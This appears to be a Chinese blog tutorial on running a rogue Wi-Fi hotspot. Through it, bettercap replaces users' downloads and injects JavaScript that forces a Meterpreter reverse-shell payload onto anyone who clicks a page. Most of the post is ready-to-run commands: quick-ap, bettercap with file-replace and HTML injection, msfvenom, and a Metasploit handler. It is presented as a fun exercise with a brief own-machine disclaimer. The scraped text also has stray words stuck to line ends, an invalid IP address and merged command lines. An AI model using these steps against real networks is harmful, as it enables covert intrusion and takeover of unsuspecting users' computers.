搭建免費熱點, 誘導局域網內用戶下載任意可執行文件(測試)

  環境需求

  1:kali系統 , 2.0版本

  2:quick-ap

  3:bettercap

  4:bettercap-proxy-modules

  5:博客園帳號(把zip文件傳到博客園的文件服務器)

  主要環境搭建

  目的:替換局域網用戶的下載文件,變爲咱們本身定義的下載文件, 這個文件能夠爲一個惡意的exe或者apkjavascript

  quick-ap經過github便可下載:https://github.com/sqqihao/quick-apcss

  須要bettercap的第三方模塊:https://github.com/sqqihao/bettercap-proxy-moduleshtml

  在kali系統中插入usb網卡, 默認的網卡爲wlan0, 若是網卡名字不同的話,後面的腳本中全部的wlan0都要改, 不保證kali的新版本可用, 測試環境的kali版本爲2.0 java

  搭建熱點 

  進入quick-ap的目錄下, 執行文件,建立熱點:git

./apd.sh

  從新打開一個窗口, 進入bettercap-proxy-modules/http目錄下,執行如下命令, 只要用戶有下載exe文件或者其餘類型的文件, 都會被替換,替換爲咱們自定義的exe文件, apk或者, rar文件也能夠, 思路不少:github

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/file.exe 

    其餘

  bettercap-proxy-modules還能夠配合beef使用, 修改頁面標題, 修改頁面樣式,嗅探登錄註冊的請求信息shell

View Code

   bettercap還能實現頁面插入css, 插入js, 插入html等功能, 這些東西能夠參考bettercap的官網 https://www.bettercap.org/docs/proxying/http.htmlwindows

InjectJS ( --proxy-module injectjs ) : Used to inject javascript code/files inside HTML pages.
InjectCSS ( --proxy-module injectcss ) : Used to inject CSS code/files inside HTML pages.
InjectHTML ( --proxy-module injecthtml ) : Used to inject HTML code inside HTML pages.

  開始搞事情,入侵你的電腦

  msf建立payload文件服務器

msfvenom -p  windows/meterpreter/reverse_tcp LHOST=10.0.0.0.1 LPORT=1111 -f exe > exe.exe

  把生成的exe壓縮, 或者用exebind綁定到其它的exe文件上, 再壓縮成zip文件, 傳到博客園的文件服務器微信

  打開msf控制檯:

use exploit/multi/handler
set lhost 10.0.0.1
set lport 1111set payload windows/meterpreter/reverse_tcp
exploit

  監聽本地端口:

  開始Arp欺騙:bettercap

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module=injecthtml --html-data "<script> document.body.onclick=function(){location.href='http://files.cnblogs.com/files/diligenceday/exe.exe.zip'} </script>"

  給全部Http頁面添加html代碼, 只要用戶點擊的body標籤, 就下載一個rar文件, 用戶只要運行這個文件, msf就會返回一個shell

  JS代碼:document.body.onclick=function(){location.href=http://files.cnblogs.com/files/diligenceday/exe.exe.zip'}的意思是當用戶點擊頁面的時候,會自動下載文件

  當用戶執行了文件之後, msf控制檯就有反應了, 6666

  結尾

  相對於使用arp欺騙,用戶瀏覽網頁的時候會很是卡

  可是使用本身建立的熱點, 在網關上面執行arp欺騙, 能夠在用戶毫無察覺的狀況下, 給用戶添加html代碼, 結合beef, 那是至關好玩啊

  本文的靶機爲本身電腦, 無惡意

  相關

  youku視頻:http://v.youku.com/v_show/id_XMjgwMjc2ODI0OA==.html?spm=a2h3j.8428770.3416059.1

  bettercap:https://www.bettercap.org/

  youtube視頻:https://www.youtube.com/watch?v=y9OYrK4j4_4
  quick-ap經過github便可下載:https://github.com/sqqihao/quick-ap

  須要bettercap的第三方模塊:https://github.com/sqqihao/bettercap-proxy-modules

做者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

相關文章
相關標籤/搜索